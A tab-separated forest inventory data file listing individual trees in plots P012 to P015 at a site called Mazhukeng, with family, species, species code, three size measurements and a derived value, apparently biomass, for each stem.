Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.5	0.000650978
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1	0.000650978
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1	0.000650978
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.4	0.000441757
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1	0.000757716
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.5	0.000757716
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	2	0.00162093
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.5	0.000864223
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2	0.00184878
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	1	0.00097053
Mazhukeng	1	P012	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	1.5	2.5	1.5	0.000317142
Mazhukeng	1	P012	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	2	3	1	0.000650978
Mazhukeng	1	P012	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	10	4	0.0436013
Mazhukeng	1	P012	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	4	1.5	0.00184878
Mazhukeng	1	P012	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	1	3.5	2.5	0.000206502
Mazhukeng	1	P012	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	2	5	2.5	0.00107666
Mazhukeng	1	P012	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	3	5	3	0.00230323
Mazhukeng	1	P012	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	12	7	0.0623909
Mazhukeng	1	P012	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	1.5	4	2	0.000503852
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1	3	1	0.000177413
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	3.5	0.7	0.000757716
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	3.5	1	0.000757716
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	4	1.5	0.000864223
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	4.5	3	0.00097053
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	4.5	2.5	0.00356116
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	5	2.5	0.00107666
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	5	2	0.00230323
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	5	1.7	0.00600364
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	6	3.5	0.00718464
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	7	6	0.8	0.0135042
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	7	3.5	0.00320825
Mazhukeng	1	P012	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	7	7.5	2.5	0.0168237
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	1.5	0.00836267
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7	2.3	0.011772
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	2.5	0.0201917
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	2.5	0.0201917
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	7	2	0.0366909
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	13	7	5	0.0501912
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	8	4	0.0287229
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	8	2.5	0.0349983
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	14	8	1.8	0.0657824
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	9	4.5	0.0469961
Mazhukeng	1	P012	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	11	7	0.0478927
Mazhukeng	1	P012	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	2	5	2.8	0.00107666
Mazhukeng	1	P012	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	3	5	3.5	0.00230323
Mazhukeng	1	P012	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1	4	2.5	0.000235529
Mazhukeng	1	P012	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	4.5	0.6	0.0020762
Mazhukeng	1	P012	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2.5	6	4	0.00195805
Mazhukeng	1	P012	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4.5	2	0.00097053
Mazhukeng	1	P013	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2.5	1	0.00014825
Mazhukeng	1	P013	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1	0.000757716
Mazhukeng	1	P013	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	4.5	2	0.0014749
Mazhukeng	1	P013	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	4.5	3	0.00097053
Mazhukeng	1	P013	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	5	3.5	0.00230323
Mazhukeng	1	P013	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	5	3	0.00395057
Mazhukeng	1	P013	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3.5	6	4	0.00368033
Mazhukeng	1	P013	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4	2	0.00184878
Mazhukeng	1	P013	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	5	1.5	0.00230323
Mazhukeng	1	P013	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8	2.5	0.0179278
Mazhukeng	1	P013	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	10	7	0.0436013
Mazhukeng	1	P013	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	10	5	0.0436013
Mazhukeng	1	P013	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	1.6	0.000118999
Mazhukeng	1	P013	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	0.8	0.000543971
Mazhukeng	1	P013	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	1.5	0.000543971
Mazhukeng	1	P013	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	0.6	0.000543971
Mazhukeng	1	P013	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	2.5	4.5	2	0.0014749
Mazhukeng	1	P013	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	5	3.5	0.00230323
Mazhukeng	1	P013	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	7	4.5	0.0366909
Mazhukeng	1	P013	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	7.5	3.5	0.00343384
Mazhukeng	1	P013	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	9	6	0.0393034
Mazhukeng	1	P013	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	10	6	0.0357834
Mazhukeng	1	P013	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	10	4	0.0521352
Mazhukeng	1	P013	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	12	7	0.125984
Mazhukeng	1	P013	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	1	1.5	0.4	8.96359e-05
Mazhukeng	1	P013	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	2	3	0.5	0.000650978
Mazhukeng	1	P013	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	2	4.5	1.3	0.00097053
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1	2.5	0.7	0.00014825
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1	3.5	1.5	0.000206502
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1	4	3	0.000235529
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	4	2.5	0.000864223
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4	2	0.00184878
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	4.5	3	0.00097053
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	4.5	2.5	0.00097053
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	5	3	0.00107666
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2.5	5	1.5	0.00163619
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	5	2.5	0.00230323
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3.5	5	3.4	0.00307536
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	6	3.5	0.00275631
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	6	4	0.00472771
Mazhukeng	1	P013	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	6	3	0.00472771
Mazhukeng	1	P013	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	2	3.5	2.5	0.000757716
Mazhukeng	1	P013	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	5	3.5	0.00395057
Mazhukeng	1	P013	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	6	4	0.00472771
Mazhukeng	1	P013	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	3.5	0.00836267
Mazhukeng	1	P013	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7	2.5	0.011772
Mazhukeng	1	P013	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	8	2	0.0179278
Mazhukeng	1	P013	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	9	2	0.0258628
Mazhukeng	1	P013	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	9	2.5	0.0553266
Mazhukeng	1	P013	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	10	3.5	0.0436013
Mazhukeng	1	P013	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	7	4.5	0.00550289
Mazhukeng	1	P013	Euphorbiaceae	Sapium	Sapium rotundifolium Hemsl.	SAPROT	5	9	4.5	0.0107114
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.5	1.5	0.000206502
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.5	2	0.000206502
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.5	1	0.000206502
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.5	0.8	0.000206502
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1	0.000757716
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	2	0.000757716
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	4	2.5	0.000235529
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	2	0.000503852
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	0.3	0.000864223
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.5	0.000864223
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.5	0.000864223
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	2	0.00097053
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	1.2	0.00097053
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	3.5	0.00230323
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	2	0.00230323
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	2.5	0.00230323
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1	0.00395057
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	3	0.00395057
Mazhukeng	1	P014	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5.5	2.5	0.00433941
Mazhukeng	1	P014	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	1.5	3.5	2	0.000441757
Mazhukeng	1	P014	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	4.5	1.5	0.00097053
Mazhukeng	1	P014	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	5	2	0.00107666
Mazhukeng	1	P014	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	5	2.5	0.00230323
Mazhukeng	1	P014	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	5	2	0.00395057
Mazhukeng	1	P014	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	5	5.5	3	0.00659455
Mazhukeng	1	P014	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	9	10	6	0.0357834
Mazhukeng	1	P014	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	14	10	4	0.0819525
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	5	2	0.00107666
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	5	2	0.00230323
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	5	3	0.00230323
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	6	4	0.00128845
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	6	4	0.00128845
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	6	2.5	0.00128845
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	6	5	0.00275631
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	6	2.5	0.00472771
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	6.5	4	0.00298241
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	6.5	4.5	0.00298241
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	6.5	4.5	0.00511552
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	7	3	0.00320825
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	7	2	0.00320825
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	7	5	0.00836267
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	7	3	0.00836267
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	7	3	0.011772
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	7	3	0.011772
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	7.5	4.5	0.00343384
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	7.5	5	0.00588983
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	7.5	3.5	0.00895072
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	7.5	5	0.0125998
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	7.5	5	0.0168237
Mazhukeng	1	P014	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	8	4	0.0230299
Mazhukeng	1	P014	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	3	1	0.000379528
Mazhukeng	1	P014	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	3	1.5	0.000379528
Mazhukeng	1	P014	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	3	6	4	0.00275631
Mazhukeng	1	P014	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2	3.5	1	0.000757716
Mazhukeng	1	P014	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	11	7	0.0478927
Mazhukeng	1	P014	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	12	7	0.0853474
Mazhukeng	1	P014	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	12	8	0.141155
Mazhukeng	1	P014	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	3.5	1	0.000757716
Mazhukeng	1	P014	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	4	1	0.00317108
Mazhukeng	1	P014	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	8	5	0.0134267
Mazhukeng	1	P014	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	10	3	0.0436013
Mazhukeng	1	P014	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	11	3	0.0572666
Mazhukeng	1	P014	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	2	5	2	0.00107666
Mazhukeng	1	P014	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	2	5	1.5	0.00107666
Mazhukeng	1	P014	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2.5	3.5	1.5	0.00115149
Mazhukeng	1	P014	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	5	3.5	0.00107666
Mazhukeng	1	P014	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	5	3.5	0.00230323
Mazhukeng	1	P014	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	6	3.5	0.00472771
Mazhukeng	1	P014	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	6	4	0.00472771
Mazhukeng	1	P014	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	6	3.5	0.0101137
Mazhukeng	1	P014	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	7	4	0.011772
Mazhukeng	1	P014	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	8	7	2.1	0.0201917
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2	0.6	0.000118999
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1.5	0.000177413
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1	0.000177413
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	0.8	0.000177413
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1	0.000177413
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1	0.000177413
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1.5	0.000177413
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1	0.000379528
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.5	0.5	0.000206502
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	0.8	0.000441757
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	0.4	0.000757716
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	1.2	0.000503852
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	4	1.5	0.00131335
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3.5	4	1.5	0.00246856
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4.5	2	0.000565831
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	1.2	0.0020762
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4.5	2	0.00356116
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	5	2	0.00163619
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	2.5	0.00230323
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1.5	0.00395057
Mazhukeng	1	P015	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	5.5	3.5	0.000322305
Mazhukeng	1	P015	Rosaceae	Pyrus	Pyrus calleryana Dcne.	PYRCAL	4	6	2	0.00472771
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	4	2	0.00184878
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	4	0.4	0.00184878
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	4.5	1.5	0.00356116
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	5	1.5	0.00107666
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	5	2	0.00107666
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	5	5	1.2	0.00600364
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	6	5	1.6	0.00845122
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	5.5	3	0.00252993
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3.5	5.5	2	0.00337805
Mazhukeng	1	P015	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	7	3	0.00149971
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	5	3	0.00230323
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	5.5	3	0.00118263
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	6	2.5	0.00275631
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	6.5	3	0.007774
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	7	3	0.00550289
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	7	3	0.00836267
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	7	3	0.011772
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8	2.5	0.0179278
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	8	4	0.0230299
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	8	3.5	0.0230299
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	8	4	0.0287229
Mazhukeng	1	P015	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	11	8	1.5	0.0418484
Mazhukeng	1	P015	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	0.5	0.000118999
Mazhukeng	1	P015	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	0.5	0.000118999
